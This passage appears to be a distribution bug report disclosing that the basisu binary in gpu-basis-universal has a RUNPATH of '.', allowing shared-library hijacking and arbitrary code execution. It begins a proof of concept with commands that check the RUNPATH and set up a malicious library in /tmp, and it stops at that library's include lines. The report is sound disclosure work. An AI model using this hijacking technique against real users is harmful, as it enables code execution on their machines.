#1138592 gpu-basis-universal: Arbitrary Code Execution via Uncontrolled Search Path Element (CWE-427) in basisu

Package:
gpu-basis-universal
Source:
gpu-basis-universal
Description:
GPU compressed texture encoding system
Submitter:
Jonathan Trowbridge
Date:
2026-05-31 22:09:02 UTC
Severity:
normal
Tags:
#1138592#5
Date:
2026-05-31 22:07:31 UTC
From:
To:
*Summary:*

The gpu-basis-universal package installs the executable:

/usr/bin/basisu

This binary is built with the following RUNPATH:

RUNPATH [.]

Including the current working directory (".") in RUNPATH causes the dynamic
loader to include the process working directory in its library search path.

As a result, an attacker may be able to achieve arbitrary code execution by
placing a malicious shared library in a directory and inducing a victim to
execute basisu from that location.

This issue falls under CWE-427 (Uncontrolled Search Path Element).

*Impact:*

If a user executes basisu while their current working directory is
attacker-controlled (for example, a downloaded archive, extracted project,
shared workspace, mounted dataset, or /tmp directory), the dynamic loader
may resolve shared library dependencies from that directory.

An attacker who can place a malicious shared library in such a location may
be able to achieve arbitrary code execution in the security context of the
user running basisu.

Code execution occurs during dynamic library loading, prior to execution of
the program's main() function.

*Proof of Concept:*

*1. Verify the RUNPATH*

$ readelf -d /usr/bin/basisu | grep RUNPATH

Output:

0x000000000000001d (RUNPATH) Library runpath: [.]

*2. Create a Malicious Library*

$ mkdir -p /tmp/malicious_workspace
$ cd /tmp/malicious_workspace
$ cat << 'EOF' > poc_basisu.c
#include <stdio.h>
#include <stdlib.h>